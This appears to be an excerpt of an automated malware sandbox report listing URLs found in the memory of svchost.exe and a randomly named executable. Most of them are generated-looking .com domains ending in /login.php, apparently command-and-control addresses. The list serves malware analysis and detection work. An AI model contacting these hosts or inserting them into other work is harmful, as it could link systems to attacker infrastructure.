Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2108057110.000000000A9AD000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2057445629.0000000008EC6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001375000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vojyjof.com/login.php
Source: svchost.exe, 00000002.00000003.1587051265.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1588374175.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjot.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojykyf.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymic.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojymuk.com/login.php
Source: svchost.exe, 00000002.00000003.2101253018.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2617205537.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1859997516.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710580103.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587585341.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595142365.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613895496.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088274615.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2101914674.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724217882.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2033340194.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801191951.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095869599.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyqac.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2073492430.00000000095CB000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001488000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000933F000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.0000000001408000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008403000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.000000000881B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.00000000012B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyqem.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrak.com/login.php
Source: svchost.exe, 00000002.00000003.1930409487.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrum.com/http://vojyrum.com/
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514765633.0000000008B09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzyt.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybak.com/login.php
Source: svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybak.com/login.php?
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volycik.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyt.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjif.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymum.com/
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722340000.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypum.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrut.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576914176.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576643702.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577232502.0000000008BFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonycum.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1577305596.0000000008B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486308101.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyket.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykuk.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.0000000009478000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014CF000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001507000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2111997635.000000000AFED000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.php
Source: svchost.exe, 00000002.00000003.1613895496.0000000002FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.phpQQC:
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598705927.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqof.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1487225312.0000000008B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/login.php
Source: svchost.exe, 00000002.00000003.1800870882.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559578676.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559905278.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1825691340.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821880893.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/login.php
Source: svchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1540976483.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1540212609.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyrot.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1471391644.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryc.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537114669.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1541111561.0000000008A25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1768332596.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/http://pujyjav.com/8X
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613886596.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632803453.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008E50000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.000000000110F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.0000000001574000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093E3000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.2033815046.00000000087F6000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001346000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1833090885.0000000001375000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.2055807285.0000000009187000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2096441666.0000000008515000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
Source: svchost.exe, 00000002.00000003.1545295076.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544887919.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542434740.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycyf.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592136244.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydaf.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1545631030.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1537002580.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533884636.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1539305897.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopygat.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/login.php
